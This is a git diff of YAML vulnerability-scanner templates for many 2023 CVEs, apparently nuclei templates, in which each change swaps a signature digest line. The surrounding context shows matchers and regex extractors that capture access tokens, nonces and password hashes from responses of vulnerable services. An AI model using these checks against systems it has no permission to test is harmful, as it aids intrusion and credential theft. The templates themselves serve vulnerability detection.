a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -75,5 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true - -# digest: 490a0046304402205305bee25697fb88bf79c8df4dc4ae53e6856c7e2174694f27ca389cfa577f0b022015f8c47368568d32a2d62797f4f50c955e1a390289a1c9caff3f8c0c26599841:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e530d11da3b017f9cdb6e81335ee1bdd63b874b2f46ef255ef935037fb1f73b5022001e6e6edb59f066ec260871a2d22e6b3b27dc51439d415a565544393a5b74ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index a11961d143..fa027a5a16 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210089f5bed14681d030af8d098d2186c497e4f47c9c60bed5e2549179c207b1dfe5022069ab07f0444ea45da62cd22e8fc59fc4ea6d862da86546b8c03bba5ce5764a16:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220495f302896668ba9eeebb68b41e871de14b56621f808eee6620817d3338af60002200e7f6ddcc5711fecd43e206082be3bba9906789cc1698fe280387e9b57f726cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index f2b8b52e6b..81a22e6cfd 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201b9720583f8fcb37e5734d8e86313ec9f030a148775e3b6847a9ef1c427fe6c60220520eda90d55b388785e4726d3c759c5ba8d0c942ffefdb720fce9c01cfe15491:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100df55949cb3cdb0d7e82d5f0fac5c34b9d6555c5e32cb5c173ffde341c7460a18022100b65face7ea52e813c01791625e0dd4b3abbec4ce8b4e88f697ff273c6d66445a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 903ca024be..2427ad1c2c 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and - -# digest: 490a00463044022017a7365b802a682c1d2bbd6b23dd9524f860625b2df753c349f3d66f55c6743e02205c6ea8c3f0cb044ac043f60873ce4e808edab42e9f113b4f7c37e68402c2ff61:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f3f1d146005f314004ca296cc5399cc7be03a2a5465a9ec6844ca80bf538aad022029d161e296e343ae6cee5e03a87fe986a828278cc67ce372b4aefcec1736eb01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 92fe956b4a..cf074079fb 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -46,5 +46,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and - -# digest: 4a0a00473045022100db94e1fe397ec05484776a74d461a3e880e96490a66eae98dfbec0e3228ba8d402204c7f02417a8fa4a69743cae52639d07e90359df81065d0e4e9aadf828fc4fa50:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210089abc4eced8561f7b508a0c58b62a558124adf4da69b428ab75faefb1d1aba3f02207bfd3600456cdcf1338ac44d2b97bce479957187b8abdcc2ebbaa63a0edb4381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index a808286946..0f86878dfa 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203bab8c109fc8937303cf7ce56eff7fe679b7365369fd8370faf49ec050eacda9022002cd3b9d3e5706dae43e79cee73995ffeef71276eeeeb2c7d792f8c95f464472:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022020a09f3054bb0159f81c62780e96d0b3a32134076237393dd7d0b6f0ca41fc3502204e0b22483045e9c156339d5482c6b66ebaec6ff889f46a8eceb8109ef6359396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index f6b7826621..9985838b2c 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -90,5 +90,4 @@ http: group: 1 regex: - "getPwdHash.*,'([0-9]+)'" - -# digest: 4a0a0047304502204c6da492b52187b1d3a218ecd52547cc179a711a48357906bc9c4c85a183c8af02210082c5834a132e92e317cb04d0b570d9407fb2f4b9430f287276fb53308e7a8043:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202e0c10e56cda355e33240b697ef5f88e2181dd420f07eb1041c74d0e83f178f5022100b9ae903b61ecdfc2eadff4a335e3ec3107c727334b1e91c8e567572eef176fd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 0645e2346e..6b1ab8bd35 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -62,5 +62,4 @@ http: part: header_2 status: - 200 - -# digest: 4b0a00483046022100c0f152c425d924a6585c974ed52ab092cec25bfa1638d2de2b6b53f250d71079022100a2cf5886627ea33229844dc97565472c1c4155b709475d175fdeca89456929aa:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022070125ffe54429c7774d0c7acb5cf5510141e93248379650f336c59a29cbe6465022042f357f312369108fcb1852640775db8dd155bc86b799483dfcc727f4e3684db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 3209a29591..1357a4f1a6 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207001b4e51270d21cf80e87bc20269786d161b4186c0b526c59136b06a265f3fa022100c7538be325574a8701380170387ef5e2081e3b54dcdb09652cd389884c7576a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202d018ce48214f9ca9bc305f8976f5c0bf555c89e0da751d46f9e1685ef2d7c2e022100bfba6862eed1b32821832774f3f23683b03bcc1a52e3f0155bd472d641e0a9b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 94321e0e61..49a0361927 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -130,5 +130,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body - -# digest: 4b0a00483046022100872dc65ec2f46a3c4d77fabad2a1638db36c814059a2375ec9efdce6d3e483ac0221008421f62be9046403725f4eb1669a13c0313ff067011045c99996c847c91a7193:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008a5a31b3e0dd2de3bb6f2b3becc149236c4ec2d0d9f516a4be687c112759399c02201d3ac6ae3957a7c56820312f6bc0d2f55c9592373ecba91c72fe309d66d14e77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index c3904d90d2..090860cf34 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -51,5 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "HotelDruid")' condition: and - -# digest: 4a0a00473045022100ed86a844734f484e58bfe04797b91fca7d8f7fbc3b0110d3beb07e1fac55004202202a1192ec05a4c73c98b5c19d640a87aaa8f1f16c3f373ab7cfbc367baeff583c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c4db6215b9adb6483c1fd998126a8ffe2e243f6fa3dc57d7f36397d38b935e1f022100bb0355938887b9717232b68d1d7d29d2956caf1498683316d72d6cf5f1c9222d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 646b1f61ec..4ad2fa5fab 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202f9244e8c13ed91fd22935fb592ddad237de7980a18ee8b2e3285f9b9cddacd602202466f00de884905bc01ae047bfc05af94e3243f6ec11ba911778730f72609b26:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f7ffdc6c1fd6e34ccb3ed8f70f39e844c8e0628cbab6b38c8039fa7897f39168022100a29fe93c75c17c50583aa839a1a2361c16c1e0faa7827c776e67b3b381ff7b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 33d57def5a..96819214ed 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -80,5 +80,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204e1bb458579da1ec29dc46a790a00c1aaf90d3a77f8a276371655d986597964b0221008ebd80928fa80172851e471979c374e48bb19c275525225c427358538e4bbdc5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204213815d7f1cd44195b8cb9aac6021d1c0917155dee43fdc956b2bbc544ca9fe02210091bc61b63d8ca95692d38ed5f6832d058dede0c2cb849c1d06cc4bc0e65ae28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 6d7d2893e2..72a1715ea9 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bc4dca9dd94c7fc6c9c45c257f70eeb2db169350376967913f5ba75fc5125948022100dd99a23c0c0ee674dc425f994440cbab4ef3c39170340fc179ec8db4937dcd57:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f742bbce8d48f057b8bc6cd0f8ed076315837197b17b2318118fb9291fd61fa6022100fe95ab2fbb2563053f7bb26ce210c4a64c5a537b90b2d611c3b669ae5efdf4e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 02c3426464..85c6bf9202 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -52,5 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and - -# digest: 4b0a00483046022100b03e91368a0c0a4837220cbfddf3c91452a4435382029a0811f45644577642e0022100aba15975ac279b55506f4c85341c78e4e4bf8dfa602953ac8e0eefc5db47ab35:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205276beb96249d237059385eb1b9d548d9dc4f7fc95eca437c4b2991b0b93b381022100ad85d5c1ee2f1d3ed7b2a931efe844e53c9877f2e20d177d88d83035657c582a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index fdf3b68507..57705b7083 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -54,5 +54,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and - -# digest: 490a0046304402203e8e7f55734f94e33105ad742a2a90a015f03b931573c1cc279f89179aa8e9e6022052c77235b007d961adef68549f97f86bc8a0764b3a51ce3bebea1d2fd772a255:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bfeb50dfee59bdf3385116a16c3a04d055fc816fd56150841e2ae17a4253ff40022100f6bf7ecd92d821eb3dd7470da7ad911b30128ec7bf2301aad2e41ac324f4e194:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 46d3717417..7aa6fa4459 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -52,5 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and - -# digest: 490a004630440220228ceee1ab3b7b2f3ca99b73ba52b4e8fa7da3b316351a25fb39a1a00c2fed050220197d0c303044854a363d09e9938f2454560ec3181bffdc8eb366701fd4f78e77:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b55f9230ec13e52bee10f5e4d592c4dcb749394f332f40d1668f14a55a1552c3022100be4b3dc6346d73534dd47dddb9163d8ef33f3bc0bc5601116c5f159b599bfdee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 6dc1d54f37..189dcf891f 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -52,5 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and - -# digest: 4a0a00473045022051039f137e8e358bc70769f5a1ebdb155407a08898ba4a298a59ffee37468b47022100e19cdfd21c52a28823aad5d68a330f6a19b80851b1fc213fb1c9ef7e251e00a1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b54992c5f7768b2c00fa4ec1b6a981f853ba41f3fd6edec66b02588cc4491e0a022100cc46211db0fd492f7971499d13f2f8d3f26b87b5403c54c830ef8f4daafd390e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 380332a649..549abcd48a 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -53,5 +53,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and - -# digest: 490a004630440220364b1ae0e616bf23087ed0955732b888b5628f8ea306e23db9e3d8c29d10543d0220021d128fca76b73fa371ebe26c8f63b42e0a4ab67d3401ce87564a0ceae74a62:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100af46a8ca671d41864e6b1c4215bbfe17356c502b845bf607e5daa89941dadd6202206abf8989c314515f696537beb760b30182e79b67c675d9fc960124ecfa990835:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 6b0b156151..12c2bfd746 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204b89ff7969f9cb36510d22da0b35de7ad7d4db70d78a7ce66784b50f877327af02202941367bb3f39956344750c70044ec9c1951c220df278ad9f977e001c6a4c698:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201cc74a1fda35300866fabf1d0ffa41c00e2d8d919325f46f9813fc5daea0f5c102205e408b6c919b894b9fa87ff91c3abd7e9239d8d324469c57d29b0b2cbc8670b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 3e5cd1e2d7..121c674b8a 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f313e31e13cf5d6822421b5f500b7d0d2fbbde3ed1c4e70bd23ba46209f9150f0221009c3ddb6fdeaa0aa3b0aded3965a016d93326f9ab8fc751b27171528c5b0c62d5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205a654ef94a1fd1bfa8f9af3c24e5cb3ee268ba7d56af48d3f153ede66b012786022100db79f57861d9e7dfd4eb9d7f05597ba8f2353f3f6b82ad7d0995e59d2b6f3dec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index e2cc884699..3e417bf1bc 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022046377bb2ffa8f3301ba127f0d0631333afba5aa154572acfc7d3ec44d3243be80220273fbaee1ce9c337f7925199e4a0e43b1d4d11d4a6ad800aaf55cc25beb59cd9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100926151b122625b633df592cda5bd29614869c47477ebac7b2289daa3593938b8022100cc11914c1f88013da90420bc33581bcace4e0e9f7179faa4bfb58022ba70f2ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 2f927041c3..2680746053 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -41,5 +41,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and - -# digest: 490a0046304402206384c048f15245469d7fc61f5ee0622ca9d2d1bede069879f6534be145db6e670220040ba282a7edccb0f8ca3c212a68141ce1e4d2ce6c1ace293da762db6a2f2266:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100de5940d87036b270d409db61efa5cb75ed372f9139e73c459f6b9b14caad1917022067fad39f3e1d4d0d640cc3bf7edce57008936779910abaae2800426ef1fe433a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index daac1adf75..0bf4a2bffb 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -53,5 +53,4 @@ http: - contains_all(body, 'commands', 'command', 'value') - status_code == 200 condition: and - -# digest: 4b0a00483046022100cbff3b7cd36a1a2a55e5246821e695295bb889ead320cc134b8983a3ab62d7cf022100a4344e427dfd4faca0b639dcdabdb6275d1eaf238537e4315de913a92c46e34b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c07de971da9434a329b847db47b0b4cc47afdcd681b54e2d091720421b605e0022002f58bd9099f299a11682b57905fb6e4d842096f69dd018c7f55ba83789ac16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 99dcb04913..6cb0b7be45 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c6919dbd2d54f6fa57b964bb0fb38b8e765ae0707d2ad86ea00a93ad560c5d3022050c60dc64e4b971e146773fa35f059a100abd4c942316b649106c63a56c77398:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e22c3535a19c3b7ae82872a64e674d71194a42959567de54d23b60a6c87f51900220518fa40b575957b18fa7c23a0f91f62aaf8344700dac5f9a2541284839888b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 97c28a7722..5074a7bdad 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a5a20e68c184ca2c5a23bbf2eebd528b53fe2951d841611f3f8af8b9a7f49840022100b1b8a6984b7681fcbb8364ae24d67cfd903beb7efd28192891e8754cd1dbd364:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ebe3a6cf5229666255ad16480353090344eb1bc53eb7626a5a7fde55f30c532b02206c8e6a25239460dd3a6f996bfa93d2c2e5b8f546da70824bfe8a219d2095ded9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index c92e5673a6..787c844281 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -68,5 +68,4 @@ http: - type: dsl dsl: - body_5 == str2 - -# digest: 4a0a00473045022100bb4dd10a111b1a58787ae1a8c07ee84d56866e5022da82fd6f92e6a68deb3f86022049b07cc6157dcd5d64d67af1ef3656432af999de7b3290ddb96151791215c301:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204ae5b43d41f91e3852cf26e40a76aeeb617bb0fc91ff098e0ef34942a1b1268302207462ef65ba97df720ed2ef2b302d7ad92ed05111357e50e01025ec4a4ffffbd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 2fbb49fa2d..8407055ef5 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205ab2f350796d20d5fd47ac0ff1f304b4f736ba67c8c127c455610e2327568176022076205e2d879b68b1ab8b4efeb5458f3d0735f93c3e2f875ed5c69c2496681cfc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201d7cbe896dda0e3e95cf4ee3f13c28882b93a3928eeeeca65b5a8d151c52cbc902204b3c17cc83ea8e1cde3ed65ef64f6661b8e981fe3cbaa25af40289eb6ba5e4ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index b7a68dc011..54a8f640d0 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009b81a6525fbbc09c828b2242f07932e6a956aca73b62ad903eedd221ccf6ef72022000a5997de0f4335b1ab7f94f61dcc71d10178db2b984ddf86c1d293f38d2de50:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201d05923a69e4d7fa35618208d7ccffe4038341a9ae503a2541c91a6cc69f5547022100ad40e03081ae876b50ec1f05c3e27b124ffa8773ed1a892009d0a2abc74c196b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index d0d8eb54dc..51274518ef 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -36,5 +36,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")' condition: and - -# digest: 490a0046304402205d66170d66a805d67f6668c5482edea9e47f22a79110a114a02195ab935bced5022006f1729891aab6407a43ee39413e2df6a0006ab9d48dbfc134c995780d48c302:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e2dde07a7e23dfd53663aa9787c77aba9dfe3d5df3e98061184745e2d35fa09802204c2663c0be9f8580b2adf37e36fdb174a573bccc0955df08f22d88ae6c0fb55e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index dda5c5f7d8..c67ae1abae 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202aa8997e53c234adf6c26c3c6132447fd5c8665834ba4cd5923577d929f45dab022100dcd43c13d41a78fde18217847a98b324907edcc0ec02b5bc6530b3f8f3b0b47b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f5529a60f360e156ef52bfdb5f00ff56ad9c9b942bed4c80ac5e17607df540b702210091f1e07da77a9f5569756f6fa62e83c148cf715fbc2011a8fe6a72e63c4c598e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index f72e25291f..4105c111d9 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -79,5 +79,4 @@ http: regex: - "([a-f0-9]{64}\\.ini)" internal: true - -# digest: 490a0046304402207dc3ae86a0a02f01d070d069d566f9fe663d0a6e6ef0b9fc2fb7b56338b39382022047e1591b1ebd934313840c7d6e3bc45e9f264d28dac2410f1d1391fc379bef54:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022017177c3e5862f25b6ef116c84fec2f6605a448f236d214ee1a12e80db9cb0499022100a114ed2831059c6aac2b160ef898e64307a438ab9253476fb91e5491fc62f3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index fb05171e58..9828857d60 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d88afaaac9016cf6232136a259924f80bb4b4878fa4150a9b6027b0a5b483dab0220396b6519d11bfd27c3fa7c3e1b9807e5f977f1bae895e59e81c7cef2f280eb75:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ebc823018135b55fc9a8a0b4400de727bbe6e4998bd97eb39e0886e6550dbb8f0221009b3d051eb8a21a71457b125c401ff713f9f254aacd3b48d2a369e8a374f2701a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 616ce40136..dc0edd8064 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -99,5 +99,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body_4 - -# digest: 4a0a00473045022100f20a543819e4ad9290625eb327a57cee7e5c7c3ab0284b06c255a8f996ae151c0220335639b82c8931aac5ccb96d4205557afdea4725c944b633066575af829fd030:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022018480e44dfb319979a6af40fe813311df1823a3eec51aaff66e707d6b7b06c7d0221008fce74e529714970d0c358b424fa8804aaa6512b15b334594adc1245cf83e096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 1dc90e6559..ef9c270628 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cdcbdd907d9c1e87034b23653b3cf17e2df59fb2e980e9871c3302f7f1a46e270220331d5f4cf2cf08508516a6e1a216be4d28de0ae44f865a521b6e45c4c2ec96da:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009bdfa5b6cef625e99461ba048b04d04ca5b6367915650f191532f893532a40d802204e5bfd4ccdb6cd4bfce47fae3238b037b2e16b74b3f198129d4ab1b9a653098a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 36cb290ad3..1d70fbead5 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -49,5 +49,4 @@ http: - type: json json: - .data.content[].path - -# digest: 4a0a00473045022100fe61ac2fe6abd7045368e18ed22d956c8ca13b3e23022a7e057700dfd9f395d0022052e3281d135c25d2ebeed8496ee50fbee4c77afb5bde05a55d29334da58fcdd4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cf7844978296b5b21b9f5afce1babb275dc356c1d3d39d1484ceb1471f60b453022100f03fb5014ed7c6c07945d47ebf928058f2441d66ef28c9face4981da5eca0ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 2938605345..8efd3b4feb 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -50,5 +50,4 @@ http: - type: json json: - .data.content[].path - -# digest: 490a00463044022015291fd7b55fc0f52fa3a9a4dc8c71ac27cf4363190030f035c80583ad43453c02207e6d7fae4d47eedd0566ef3d0a495b82716f962cd6f2fa75e6b8f0d66b49b444:922c64590222798bb761d5b6d8e72950 +# digest: 